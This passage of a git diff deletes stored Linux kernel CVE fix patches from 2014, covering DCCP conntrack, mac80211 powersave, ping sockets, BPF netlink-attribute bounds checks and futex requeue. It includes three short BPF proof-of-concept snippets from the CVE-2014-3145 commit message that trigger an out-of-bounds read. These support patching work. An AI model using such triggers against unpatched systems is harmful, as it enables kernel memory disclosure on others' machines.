- 	u_int8_t type, old_state, new_state;
- 	enum ct_dccp_roles role;
- 
--	dh = skb_header_pointer(skb, dataoff, sizeof(_dh), &dh);
-+	dh = skb_header_pointer(skb, dataoff, sizeof(_dh), &_dh);
- 	BUG_ON(dh == NULL);
- 	type = dh->dccph_type;
- 
-@@ -575,7 +575,7 @@ static int dccp_error(struct net *net, struct nf_conn *tmpl,
- 	unsigned int cscov;
- 	const char *msg;
- 
--	dh = skb_header_pointer(skb, dataoff, sizeof(_dh), &dh);
-+	dh = skb_header_pointer(skb, dataoff, sizeof(_dh), &_dh);
- 	if (dh == NULL) {
- 		msg = "nf_ct_dccp: short packet ";
- 		goto out_invalid;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-2523/^3.13/0002.patch b/Patches/Linux_CVEs/CVE-2014-2523/^3.13/0002.patch
deleted file mode 100644
index f319b8d5..00000000
--- a/Patches/Linux_CVEs/CVE-2014-2523/^3.13/0002.patch
+++ /dev/null
@@ -1,59 +0,0 @@
-From b22f5126a24b3b2f15448c3f2a254fc10cbc2b92 Mon Sep 17 00:00:00 2001
-From: Daniel Borkmann <dborkman@redhat.com>
-Date: Mon, 6 Jan 2014 00:57:54 +0100
-Subject: [PATCH] netfilter: nf_conntrack_dccp: fix skb_header_pointer API
- usages
-
-Some occurences in the netfilter tree use skb_header_pointer() in
-the following way ...
-
-  struct dccp_hdr _dh, *dh;
-  ...
-  skb_header_pointer(skb, dataoff, sizeof(_dh), &dh);
-
-... where dh itself is a pointer that is being passed as the copy
-buffer. Instead, we need to use &_dh as the forth argument so that
-we're copying the data into an actual buffer that sits on the stack.
-
-Currently, we probably could overwrite memory on the stack (e.g.
-with a possibly mal-formed DCCP packet), but unintentionally, as
-we only want the buffer to be placed into _dh variable.
-
-Fixes: 2bc780499aa3 ("[NETFILTER]: nf_conntrack: add DCCP protocol support")
-Signed-off-by: Daniel Borkmann <dborkman@redhat.com>
-Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
----
- net/netfilter/nf_conntrack_proto_dccp.c | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/net/netfilter/nf_conntrack_proto_dccp.c b/net/netfilter/nf_conntrack_proto_dccp.c
-index 38412684a8824..cb372f96f10dc 100644
---- a/net/netfilter/nf_conntrack_proto_dccp.c
-+++ b/net/netfilter/nf_conntrack_proto_dccp.c
-@@ -428,7 +428,7 @@ static bool dccp_new(struct nf_conn *ct, const struct sk_buff *skb,
- 	const char *msg;
- 	u_int8_t state;
- 
--	dh = skb_header_pointer(skb, dataoff, sizeof(_dh), &dh);
-+	dh = skb_header_pointer(skb, dataoff, sizeof(_dh), &_dh);
- 	BUG_ON(dh == NULL);
- 
- 	state = dccp_state_table[CT_DCCP_ROLE_CLIENT][dh->dccph_type][CT_DCCP_NONE];
-@@ -486,7 +486,7 @@ static int dccp_packet(struct nf_conn *ct, const struct sk_buff *skb,
- 	u_int8_t type, old_state, new_state;
- 	enum ct_dccp_roles role;
- 
--	dh = skb_header_pointer(skb, dataoff, sizeof(_dh), &dh);
-+	dh = skb_header_pointer(skb, dataoff, sizeof(_dh), &_dh);
- 	BUG_ON(dh == NULL);
- 	type = dh->dccph_type;
- 
-@@ -577,7 +577,7 @@ static int dccp_error(struct net *net, struct nf_conn *tmpl,
- 	unsigned int cscov;
- 	const char *msg;
- 
--	dh = skb_header_pointer(skb, dataoff, sizeof(_dh), &dh);
-+	dh = skb_header_pointer(skb, dataoff, sizeof(_dh), &_dh);
- 	if (dh == NULL) {
- 		msg = "nf_ct_dccp: short packet ";
- 		goto out_invalid;
diff --git a/Patches/Linux_CVEs/CVE-2014-2706/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-2706/ANY/0001.patch
deleted file mode 100644
index 9ae44f32..00000000
--- a/Patches/Linux_CVEs/CVE-2014-2706/ANY/0001.patch
+++ /dev/null
@@ -1,160 +0,0 @@
-From 1d147bfa64293b2723c4fec50922168658e613ba Mon Sep 17 00:00:00 2001
-From: Emmanuel Grumbach <emmanuel.grumbach@intel.com>
-Date: Thu, 20 Feb 2014 09:22:11 +0200
-Subject: mac80211: fix AP powersave TX vs. wakeup race
-
-There is a race between the TX path and the STA wakeup: while
-a station is sleeping, mac80211 buffers frames until it wakes
-up, then the frames are transmitted. However, the RX and TX
-path are concurrent, so the packet indicating wakeup can be
-processed while a packet is being transmitted.
-
-This can lead to a situation where the buffered frames list
-is emptied on the one side, while a frame is being added on
-the other side, as the station is still seen as sleeping in
-the TX path.
-
-As a result, the newly added frame will not be send anytime
-soon. It might be sent much later (and out of order) when the
-station goes to sleep and wakes up the next time.
-
-Additionally, it can lead to the crash below.
-
-Fix all this by synchronising both paths with a new lock.
-Both path are not fastpath since they handle PS situations.
-
-In a later patch we'll remove the extra skb queue locks to
-reduce locking overhead.
-
-BUG: unable to handle kernel
-NULL pointer dereference at 000000b0
-IP: [<ff6f1791>] ieee80211_report_used_skb+0x11/0x3e0 [mac80211]
-*pde = 00000000
-Oops: 0000 [#1] SMP DEBUG_PAGEALLOC
-EIP: 0060:[<ff6f1791>] EFLAGS: 00210282 CPU: 1
-EIP is at ieee80211_report_used_skb+0x11/0x3e0 [mac80211]
-EAX: e5900da0 EBX: 00000000 ECX: 00000001 EDX: 00000000
-ESI: e41d00c0 EDI: e5900da0 EBP: ebe458e4 ESP: ebe458b0
- DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068
-CR0: 8005003b CR2: 000000b0 CR3: 25a78000 CR4: 000407d0
-DR0: 00000000 DR1: 00000000 DR2: 00000000 DR3: 00000000
-DR6: ffff0ff0 DR7: 00000400
-Process iperf (pid: 3934, ti=ebe44000 task=e757c0b0 task.ti=ebe44000)
-iwlwifi 0000:02:00.0: I iwl_pcie_enqueue_hcmd Sending command LQ_CMD (#4e), seq: 0x0903, 92 bytes at 3[3]:9
-Stack:
- e403b32c ebe458c4 00200002 00200286 e403b338 ebe458cc c10960bb e5900da0
- ff76a6ec ebe458d8 00000000 e41d00c0 e5900da0 ebe458f0 ff6f1b75 e403b210
- ebe4598c ff723dc1 00000000 ff76a6ec e597c978 e403b758 00000002 00000002
-Call Trace:
- [<ff6f1b75>] ieee80211_free_txskb+0x15/0x20 [mac80211]
- [<ff723dc1>] invoke_tx_handlers+0x1661/0x1780 [mac80211]
- [<ff7248a5>] ieee80211_tx+0x75/0x100 [mac80211]
- [<ff7249bf>] ieee80211_xmit+0x8f/0xc0 [mac80211]
- [<ff72550e>] ieee80211_subif_start_xmit+0x4fe/0xe20 [mac80211]
- [<c149ef70>] dev_hard_start_xmit+0x450/0x950
- [<c14b9aa9>] sch_direct_xmit+0xa9/0x250
- [<c14b9c9b>] __qdisc_run+0x4b/0x150
- [<c149f732>] dev_queue_xmit+0x2c2/0xca0
-
-Cc: stable@vger.kernel.org
-Reported-by: Yaara Rozenblum <yaara.rozenblum@intel.com>
-Signed-off-by: Emmanuel Grumbach <emmanuel.grumbach@intel.com>
-Reviewed-by: Stanislaw Gruszka <sgruszka@redhat.com>
-[reword commit log, use a separate lock]
-Signed-off-by: Johannes Berg <johannes.berg@intel.com>
----
- net/mac80211/sta_info.c |  4 ++++
- net/mac80211/sta_info.h |  7 +++----
- net/mac80211/tx.c       | 15 +++++++++++++++
- 3 files changed, 22 insertions(+), 4 deletions(-)
-
-diff --git a/net/mac80211/sta_info.c b/net/mac80211/sta_info.c
-index decd30c..62a5f08 100644
---- a/net/mac80211/sta_info.c
-+++ b/net/mac80211/sta_info.c
-@@ -330,6 +330,7 @@ struct sta_info *sta_info_alloc(struct ieee80211_sub_if_data *sdata,
- 	rcu_read_unlock();
- 
- 	spin_lock_init(&sta->lock);
-+	spin_lock_init(&sta->ps_lock);
- 	INIT_WORK(&sta->drv_unblock_wk, sta_unblock);
- 	INIT_WORK(&sta->ampdu_mlme.work, ieee80211_ba_session_work);
- 	mutex_init(&sta->ampdu_mlme.mtx);
-@@ -1109,6 +1110,8 @@ void ieee80211_sta_ps_deliver_wakeup(struct sta_info *sta)
- 
- 	skb_queue_head_init(&pending);
- 
-+	/* sync with ieee80211_tx_h_unicast_ps_buf */
-+	spin_lock(&sta->ps_lock);
- 	/* Send all buffered frames to the station */
- 	for (ac = 0; ac < IEEE80211_NUM_ACS; ac++) {
- 		int count = skb_queue_len(&pending), tmp;
-@@ -1128,6 +1131,7 @@ void ieee80211_sta_ps_deliver_wakeup(struct sta_info *sta)
- 	}
- 
- 	ieee80211_add_pending_skbs_fn(local, &pending, clear_sta_ps_flags, sta);
-+	spin_unlock(&sta->ps_lock);
- 
- 	/* This station just woke up and isn't aware of our SMPS state */
- 	if (!ieee80211_smps_is_restrictive(sta->known_smps_mode,
-diff --git a/net/mac80211/sta_info.h b/net/mac80211/sta_info.h
-index d77ff70..d3a6d82 100644
---- a/net/mac80211/sta_info.h
-+++ b/net/mac80211/sta_info.h
-@@ -267,6 +267,7 @@ struct ieee80211_tx_latency_stat {
-  * @drv_unblock_wk: used for driver PS unblocking
-  * @listen_interval: listen interval of this station, when we're acting as AP
-  * @_flags: STA flags, see &enum ieee80211_sta_info_flags, do not use directly
-+ * @ps_lock: used for powersave (when mac80211 is the AP) related locking
-  * @ps_tx_buf: buffers (per AC) of frames to transmit to this station
-  *	when it leaves power saving state or polls
-  * @tx_filtered: buffers (per AC) of frames we already tried to
-@@ -356,10 +357,8 @@ struct sta_info {
- 	/* use the accessors defined below */
- 	unsigned long _flags;
- 
--	/*
--	 * STA powersave frame queues, no more than the internal
--	 * locking required.
--	 */
-+	/* STA powersave lock and frame queues */
-+	spinlock_t ps_lock;
- 	struct sk_buff_head ps_tx_buf[IEEE80211_NUM_ACS];
- 	struct sk_buff_head tx_filtered[IEEE80211_NUM_ACS];
- 	unsigned long driver_buffered_tids;
-diff --git a/net/mac80211/tx.c b/net/mac80211/tx.c
-index 97a02d3..4080c61 100644
---- a/net/mac80211/tx.c
-+++ b/net/mac80211/tx.c
-@@ -478,6 +478,20 @@ ieee80211_tx_h_unicast_ps_buf(struct ieee80211_tx_data *tx)
- 		       sta->sta.addr, sta->sta.aid, ac);
- 		if (tx->local->total_ps_buffered >= TOTAL_MAX_TX_BUFFER)
- 			purge_old_ps_buffers(tx->local);
-+
-+		/* sync with ieee80211_sta_ps_deliver_wakeup */
-+		spin_lock(&sta->ps_lock);
-+		/*
-+		 * STA woke up the meantime and all the frames on ps_tx_buf have
-+		 * been queued to pending queue. No reordering can happen, go
-+		 * ahead and Tx the packet.
-+		 */
-+		if (!test_sta_flag(sta, WLAN_STA_PS_STA) &&
-+		    !test_sta_flag(sta, WLAN_STA_PS_DRIVER)) {
-+			spin_unlock(&sta->ps_lock);
-+			return TX_CONTINUE;
-+		}
-+
- 		if (skb_queue_len(&sta->ps_tx_buf[ac]) >= STA_MAX_TX_BUFFER) {
- 			struct sk_buff *old = skb_dequeue(&sta->ps_tx_buf[ac]);
- 			ps_dbg(tx->sdata,
-@@ -492,6 +506,7 @@ ieee80211_tx_h_unicast_ps_buf(struct ieee80211_tx_data *tx)
- 		info->flags |= IEEE80211_TX_INTFL_NEED_TXPROCESSING;
- 		info->flags &= ~IEEE80211_TX_TEMPORARY_FLAGS;
- 		skb_queue_tail(&sta->ps_tx_buf[ac], tx->skb);
-+		spin_unlock(&sta->ps_lock);
- 
- 		if (!timer_pending(&local->sta_cleanup))
- 			mod_timer(&local->sta_cleanup,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-2851/3.2/0001.patch b/Patches/Linux_CVEs/CVE-2014-2851/3.2/0001.patch
deleted file mode 100644
index a954b65f..00000000
--- a/Patches/Linux_CVEs/CVE-2014-2851/3.2/0001.patch
+++ /dev/null
@@ -1,64 +0,0 @@
-From b04c46190219a4f845e46a459e3102137b7f6cac Mon Sep 17 00:00:00 2001
-From: "Wang, Xiaoming" <xiaoming.wang@intel.com>
-Date: Mon, 14 Apr 2014 12:30:45 -0400
-Subject: net: ipv4: current group_info should be put after using.
-
-Plug a group_info refcount leak in ping_init.
-group_info is only needed during initialization and
-the code failed to release the reference on exit.
-While here move grabbing the reference to a place
-where it is actually needed.
-
-Signed-off-by: Chuansheng Liu <chuansheng.liu@intel.com>
-Signed-off-by: Zhang Dongxing <dongxing.zhang@intel.com>
-Signed-off-by: xiaoming wang <xiaoming.wang@intel.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/ipv4/ping.c | 15 +++++++++++----
- 1 file changed, 11 insertions(+), 4 deletions(-)
-
-diff --git a/net/ipv4/ping.c b/net/ipv4/ping.c
-index f4b19e5..8210964 100644
---- a/net/ipv4/ping.c
-+++ b/net/ipv4/ping.c
-@@ -252,26 +252,33 @@ int ping_init_sock(struct sock *sk)
- {
- 	struct net *net = sock_net(sk);
- 	kgid_t group = current_egid();
--	struct group_info *group_info = get_current_groups();
--	int i, j, count = group_info->ngroups;
-+	struct group_info *group_info;
-+	int i, j, count;
- 	kgid_t low, high;
-+	int ret = 0;
- 
- 	inet_get_ping_group_range_net(net, &low, &high);
- 	if (gid_lte(low, group) && gid_lte(group, high))
- 		return 0;
- 
-+	group_info = get_current_groups();
-+	count = group_info->ngroups;
- 	for (i = 0; i < group_info->nblocks; i++) {
- 		int cp_count = min_t(int, NGROUPS_PER_BLOCK, count);
- 		for (j = 0; j < cp_count; j++) {
- 			kgid_t gid = group_info->blocks[i][j];
- 			if (gid_lte(low, gid) && gid_lte(gid, high))
--				return 0;
-+				goto out_release_group;
- 		}
- 
- 		count -= cp_count;
- 	}
- 
--	return -EACCES;
-+	ret = -EACCES;
-+
-+out_release_group:
-+	put_group_info(group_info);
-+	return ret;
- }
- EXPORT_SYMBOL_GPL(ping_init_sock);
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-3145/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-3145/ANY/0001.patch
deleted file mode 100644
index 789a053c..00000000
--- a/Patches/Linux_CVEs/CVE-2014-3145/ANY/0001.patch
+++ /dev/null
@@ -1,91 +0,0 @@
-From 314760e66c35c8ffa51b4c4ca6948d207e783079 Mon Sep 17 00:00:00 2001
-From: Mathias Krause <minipli@googlemail.com>
-Date: Sun, 13 Apr 2014 18:23:33 +0200
-Subject: filter: prevent nla extensions to peek beyond the end of the message
-
-[ Upstream commit 05ab8f2647e4221cbdb3856dd7d32bd5407316b3 ]
-
-The BPF_S_ANC_NLATTR and BPF_S_ANC_NLATTR_NEST extensions fail to check
-for a minimal message length before testing the supplied offset to be
-within the bounds of the message. This allows the subtraction of the nla
-header to underflow and therefore -- as the data type is unsigned --
-allowing far to big offset and length values for the search of the
-netlink attribute.
-
-The remainder calculation for the BPF_S_ANC_NLATTR_NEST extension is
-also wrong. It has the minuend and subtrahend mixed up, therefore
-calculates a huge length value, allowing to overrun the end of the
-message while looking for the netlink attribute.
-
-The following three BPF snippets will trigger the bugs when attached to
-a UNIX datagram socket and parsing a message with length 1, 2 or 3.
-
- ,-[ PoC for missing size check in BPF_S_ANC_NLATTR ]--
- | ld	#0x87654321
- | ldx	#42
- | ld	#nla
- | ret	a
- `---
-
- ,-[ PoC for the same bug in BPF_S_ANC_NLATTR_NEST ]--
- | ld	#0x87654321
- | ldx	#42
- | ld	#nlan
- | ret	a
- `---
-
- ,-[ PoC for wrong remainder calculation in BPF_S_ANC_NLATTR_NEST ]--
- | ; (needs a fake netlink header at offset 0)
- | ld	#0
- | ldx	#42
- | ld	#nlan
- | ret	a
- `---
-
-Fix the first issue by ensuring the message length fulfills the minimal
-size constrains of a nla header. Fix the second bug by getting the math
-for the remainder calculation right.
-
-Fixes: 4738c1db15 ("[SKFILTER]: Add SKF_ADF_NLATTR instruction")
-Fixes: d214c7537b ("filter: add SKF_AD_NLATTR_NEST to look for nested..")
-Cc: Patrick McHardy <kaber@trash.net>
-Cc: Pablo Neira Ayuso <pablo@netfilter.org>
-Signed-off-by: Mathias Krause <minipli@googlemail.com>
-Acked-by: Daniel Borkmann <dborkman@redhat.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- net/core/filter.c | 6 +++++-
- 1 file changed, 5 insertions(+), 1 deletion(-)
-
-diff --git a/net/core/filter.c b/net/core/filter.c
-index 52f01229..c6c18d8 100644
---- a/net/core/filter.c
-+++ b/net/core/filter.c
-@@ -355,6 +355,8 @@ load_b:
- 
- 			if (skb_is_nonlinear(skb))
- 				return 0;
-+			if (skb->len < sizeof(struct nlattr))
-+				return 0;
- 			if (A > skb->len - sizeof(struct nlattr))
- 				return 0;
- 
-@@ -371,11 +373,13 @@ load_b:
- 
- 			if (skb_is_nonlinear(skb))
- 				return 0;
-+			if (skb->len < sizeof(struct nlattr))
-+				return 0;
- 			if (A > skb->len - sizeof(struct nlattr))
- 				return 0;
- 
- 			nla = (struct nlattr *)&skb->data[A];
--			if (nla->nla_len > A - skb->len)
-+			if (nla->nla_len > skb->len - A)
- 				return 0;
- 
- 			nla = nla_find_nested(nla, X);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-3145/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2014-3145/ANY/0002.patch
deleted file mode 100644
index 3e4a0227..00000000
--- a/Patches/Linux_CVEs/CVE-2014-3145/ANY/0002.patch
+++ /dev/null
@@ -1,90 +0,0 @@
-From 05ab8f2647e4221cbdb3856dd7d32bd5407316b3 Mon Sep 17 00:00:00 2001
-From: Mathias Krause <minipli@googlemail.com>
-Date: Sun, 13 Apr 2014 18:23:33 +0200
-Subject: filter: prevent nla extensions to peek beyond the end of the message
-
-The BPF_S_ANC_NLATTR and BPF_S_ANC_NLATTR_NEST extensions fail to check
-for a minimal message length before testing the supplied offset to be
-within the bounds of the message. This allows the subtraction of the nla
-header to underflow and therefore -- as the data type is unsigned --
-allowing far to big offset and length values for the search of the
-netlink attribute.
-
-The remainder calculation for the BPF_S_ANC_NLATTR_NEST extension is
-also wrong. It has the minuend and subtrahend mixed up, therefore
-calculates a huge length value, allowing to overrun the end of the
-message while looking for the netlink attribute.
-
-The following three BPF snippets will trigger the bugs when attached to
-a UNIX datagram socket and parsing a message with length 1, 2 or 3.
-
- ,-[ PoC for missing size check in BPF_S_ANC_NLATTR ]--
- | ld	#0x87654321
- | ldx	#42
- | ld	#nla
- | ret	a
- `---
-
- ,-[ PoC for the same bug in BPF_S_ANC_NLATTR_NEST ]--
- | ld	#0x87654321
- | ldx	#42
- | ld	#nlan
- | ret	a
- `---
-
- ,-[ PoC for wrong remainder calculation in BPF_S_ANC_NLATTR_NEST ]--
- | ; (needs a fake netlink header at offset 0)
- | ld	#0
- | ldx	#42
- | ld	#nlan
- | ret	a
- `---
-
-Fix the first issue by ensuring the message length fulfills the minimal
-size constrains of a nla header. Fix the second bug by getting the math
-for the remainder calculation right.
-
-Fixes: 4738c1db15 ("[SKFILTER]: Add SKF_ADF_NLATTR instruction")
-Fixes: d214c7537b ("filter: add SKF_AD_NLATTR_NEST to look for nested..")
-Cc: Patrick McHardy <kaber@trash.net>
-Cc: Pablo Neira Ayuso <pablo@netfilter.org>
-Signed-off-by: Mathias Krause <minipli@googlemail.com>
-Acked-by: Daniel Borkmann <dborkman@redhat.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/core/filter.c | 8 +++++++-
- 1 file changed, 7 insertions(+), 1 deletion(-)
-
-diff --git a/net/core/filter.c b/net/core/filter.c
-index e08b382..0e0856f 100644
---- a/net/core/filter.c
-+++ b/net/core/filter.c
-@@ -600,6 +600,9 @@ static u64 __skb_get_nlattr(u64 ctx, u64 A, u64 X, u64 r4, u64 r5)
- 	if (skb_is_nonlinear(skb))
- 		return 0;
- 
-+	if (skb->len < sizeof(struct nlattr))
-+		return 0;
-+
- 	if (A > skb->len - sizeof(struct nlattr))
- 		return 0;
- 
-@@ -618,11 +621,14 @@ static u64 __skb_get_nlattr_nest(u64 ctx, u64 A, u64 X, u64 r4, u64 r5)
- 	if (skb_is_nonlinear(skb))
- 		return 0;
- 
-+	if (skb->len < sizeof(struct nlattr))
-+		return 0;
-+
- 	if (A > skb->len - sizeof(struct nlattr))
- 		return 0;
- 
- 	nla = (struct nlattr *) &skb->data[A];
--	if (nla->nla_len > A - skb->len)
-+	if (nla->nla_len > skb->len - A)
- 		return 0;
- 
- 	nla = nla_find_nested(nla, X);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-3153/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-3153/ANY/0001.patch
deleted file mode 100644
index aa84e2d1..00000000
--- a/Patches/Linux_CVEs/CVE-2014-3153/ANY/0001.patch
+++ /dev/null
@@ -1,84 +0,0 @@
-From e9c243a5a6de0be8e584c604d353412584b592f8 Mon Sep 17 00:00:00 2001
-From: Thomas Gleixner <tglx@linutronix.de>
-Date: Tue, 3 Jun 2014 12:27:06 +0000
-Subject: futex-prevent-requeue-pi-on-same-futex.patch futex: Forbid uaddr ==
- uaddr2 in futex_requeue(..., requeue_pi=1)
-
-If uaddr == uaddr2, then we have broken the rule of only requeueing from
-a non-pi futex to a pi futex with this call.  If we attempt this, then
-dangling pointers may be left for rt_waiter resulting in an exploitable
-condition.
-
-This change brings futex_requeue() in line with futex_wait_requeue_pi()
-which performs the same check as per commit 6f7b0a2a5c0f ("futex: Forbid
-uaddr == uaddr2 in futex_wait_requeue_pi()")
-
-[ tglx: Compare the resulting keys as well, as uaddrs might be
-  	different depending on the mapping ]
-
-Fixes CVE-2014-3153.
-
-Reported-by: Pinkie Pie
-Signed-off-by: Will Drewry <wad@chromium.org>
-Signed-off-by: Kees Cook <keescook@chromium.org>
-Cc: stable@vger.kernel.org
-Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
-Reviewed-by: Darren Hart <dvhart@linux.intel.com>
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
----
- kernel/futex.c | 25 +++++++++++++++++++++++++
- 1 file changed, 25 insertions(+)
-
-diff --git a/kernel/futex.c b/kernel/futex.c
-index 81dbe77..663ea2b 100644
---- a/kernel/futex.c
-+++ b/kernel/futex.c
-@@ -1442,6 +1442,13 @@ static int futex_requeue(u32 __user *uaddr1, unsigned int flags,
- 
- 	if (requeue_pi) {
- 		/*
-+		 * Requeue PI only works on two distinct uaddrs. This
-+		 * check is only valid for private futexes. See below.
-+		 */
-+		if (uaddr1 == uaddr2)
-+			return -EINVAL;
-+
-+		/*
- 		 * requeue_pi requires a pi_state, try to allocate it now
- 		 * without any locks in case it fails.
- 		 */
-@@ -1479,6 +1486,15 @@ retry:
- 	if (unlikely(ret != 0))
- 		goto out_put_key1;
- 
-+	/*
-+	 * The check above which compares uaddrs is not sufficient for
-+	 * shared futexes. We need to compare the keys:
-+	 */
-+	if (requeue_pi && match_futex(&key1, &key2)) {
-+		ret = -EINVAL;
-+		goto out_put_keys;
-+	}
-+
- 	hb1 = hash_futex(&key1);
- 	hb2 = hash_futex(&key2);
- 
-@@ -2525,6 +2541,15 @@ static int futex_wait_requeue_pi(u32 __user *uaddr, unsigned int flags,
- 	if (ret)
- 		goto out_key2;
- 
-+	/*
-+	 * The check above which compares uaddrs is not sufficient for
-+	 * shared futexes. We need to compare the keys:
-+	 */
-+	if (match_futex(&q.key, &key2)) {
-+		ret = -EINVAL;
-+		goto out_put_keys;
-+	}
-+
- 	/* Queue the futex_q, drop the hb lock, wait for wakeup. */
- 	futex_wait_queue_me(hb, &q, to);
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-3153/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2014-3153/ANY/0002.patch
deleted file mode 100644
index 3a9932a5..00000000
--- a/Patches/Linux_CVEs/CVE-2014-3153/ANY/0002.patch
+++ /dev/null
@@ -1,100 +0,0 @@
-From 13fbca4c6ecd96ec1a1cfa2e4f2ce191fe928a5e Mon Sep 17 00:00:00 2001
-From: Thomas Gleixner <tglx@linutronix.de>
-Date: Tue, 3 Jun 2014 12:27:07 +0000
-Subject: futex: Always cleanup owner tid in unlock_pi
-
-If the owner died bit is set at futex_unlock_pi, we currently do not
-cleanup the user space futex.  So the owner TID of the current owner
-(the unlocker) persists.  That's observable inconsistant state,
-especially when the ownership of the pi state got transferred.
-
-Clean it up unconditionally.
-
-Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
-Cc: Kees Cook <keescook@chromium.org>
-Cc: Will Drewry <wad@chromium.org>
-Cc: Darren Hart <dvhart@linux.intel.com>
-Cc: stable@vger.kernel.org
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
----
- kernel/futex.c | 40 ++++++++++++++++++----------------------
- 1 file changed, 18 insertions(+), 22 deletions(-)
-
-diff --git a/kernel/futex.c b/kernel/futex.c
-index 520e7b2..e1cb1ba 100644
---- a/kernel/futex.c
-+++ b/kernel/futex.c
-@@ -1052,6 +1052,7 @@ static int wake_futex_pi(u32 __user *uaddr, u32 uval, struct futex_q *this)
- 	struct task_struct *new_owner;
- 	struct futex_pi_state *pi_state = this->pi_state;
- 	u32 uninitialized_var(curval), newval;
-+	int ret = 0;
- 
- 	if (!pi_state)
- 		return -EINVAL;
-@@ -1075,23 +1076,19 @@ static int wake_futex_pi(u32 __user *uaddr, u32 uval, struct futex_q *this)
- 		new_owner = this->task;
- 
- 	/*
--	 * We pass it to the next owner. (The WAITERS bit is always
--	 * kept enabled while there is PI state around. We must also
--	 * preserve the owner died bit.)
-+	 * We pass it to the next owner. The WAITERS bit is always
-+	 * kept enabled while there is PI state around. We cleanup the
-+	 * owner died bit, because we are the owner.
- 	 */
--	if (!(uval & FUTEX_OWNER_DIED)) {
--		int ret = 0;
--
--		newval = FUTEX_WAITERS | task_pid_vnr(new_owner);
-+	newval = FUTEX_WAITERS | task_pid_vnr(new_owner);
- 
--		if (cmpxchg_futex_value_locked(&curval, uaddr, uval, newval))
--			ret = -EFAULT;
--		else if (curval != uval)
--			ret = -EINVAL;
--		if (ret) {
--			raw_spin_unlock(&pi_state->pi_mutex.wait_lock);
--			return ret;
--		}
-+	if (cmpxchg_futex_value_locked(&curval, uaddr, uval, newval))
-+		ret = -EFAULT;
-+	else if (curval != uval)
-+		ret = -EINVAL;
-+	if (ret) {
-+		raw_spin_unlock(&pi_state->pi_mutex.wait_lock);
-+		return ret;
- 	}
- 
- 	raw_spin_lock_irq(&pi_state->owner->pi_lock);
-@@ -2351,9 +2348,10 @@ retry:
- 	/*
- 	 * To avoid races, try to do the TID -> 0 atomic transition
- 	 * again. If it succeeds then we can return without waking
--	 * anyone else up:
-+	 * anyone else up. We only try this if neither the waiters nor
-+	 * the owner died bit are set.
- 	 */
--	if (!(uval & FUTEX_OWNER_DIED) &&
-+	if (!(uval & ~FUTEX_TID_MASK) &&
- 	    cmpxchg_futex_value_locked(&uval, uaddr, vpid, 0))
- 		goto pi_faulted;
- 	/*
-@@ -2383,11 +2381,9 @@ retry:
- 	/*
- 	 * No waiters - kernel unlocks the futex:
- 	 */
--	if (!(uval & FUTEX_OWNER_DIED)) {
--		ret = unlock_futex_pi(uaddr, uval);
--		if (ret == -EFAULT)
--			goto pi_faulted;
--	}
-+	ret = unlock_futex_pi(uaddr, uval);
-+	if (ret == -EFAULT)
-+		goto pi_faulted;
- 
- out_unlock:
- 	spin_unlock(&hb->lock);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-3153/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2014-3153/ANY/0003.patch
deleted file mode 100644
index beda251e..00000000
--- a/Patches/Linux_CVEs/CVE-2014-3153/ANY/0003.patch
+++ /dev/null
@@ -1,279 +0,0 @@
-From 54a217887a7b658e2650c3feff22756ab80c7339 Mon Sep 17 00:00:00 2001
-From: Thomas Gleixner <tglx@linutronix.de>
-Date: Tue, 3 Jun 2014 12:27:08 +0000
-Subject: futex: Make lookup_pi_state more robust
-
-The current implementation of lookup_pi_state has ambigous handling of
-the TID value 0 in the user space futex.  We can get into the kernel
-even if the TID value is 0, because either there is a stale waiters bit
-or the owner died bit is set or we are called from the requeue_pi path
-or from user space just for fun.
-
-The current code avoids an explicit sanity check for pid = 0 in case
-that kernel internal state (waiters) are found for the user space
-address.  This can lead to state leakage and worse under some
-circumstances.
-
-Handle the cases explicit:
-
-       Waiter | pi_state | pi->owner | uTID      | uODIED | ?
-
-  [1]  NULL   | ---      | ---       | 0         | 0/1    | Valid
-  [2]  NULL   | ---      | ---       | >0        | 0/1    | Valid
-
-  [3]  Found  | NULL     | --        | Any       | 0/1    | Invalid
-
-  [4]  Found  | Found    | NULL      | 0         | 1      | Valid
-  [5]  Found  | Found    | NULL      | >0        | 1      | Invalid
-
-  [6]  Found  | Found    | task      | 0         | 1      | Valid
-
-  [7]  Found  | Found    | NULL      | Any       | 0      | Invalid
-
-  [8]  Found  | Found    | task      | ==taskTID | 0/1    | Valid
-  [9]  Found  | Found    | task      | 0         | 0      | Invalid
-  [10] Found  | Found    | task      | !=taskTID | 0/1    | Invalid
-
- [1] Indicates that the kernel can acquire the futex atomically. We
-     came came here due to a stale FUTEX_WAITERS/FUTEX_OWNER_DIED bit.
-
- [2] Valid, if TID does not belong to a kernel thread. If no matching
-     thread is found then it indicates that the owner TID has died.
-
- [3] Invalid. The waiter is queued on a non PI futex
-
- [4] Valid state after exit_robust_list(), which sets the user space
-     value to FUTEX_WAITERS | FUTEX_OWNER_DIED.
-
- [5] The user space value got manipulated between exit_robust_list()
-     and exit_pi_state_list()
-
- [6] Valid state after exit_pi_state_list() which sets the new owner in
-     the pi_state but cannot access the user space value.
-
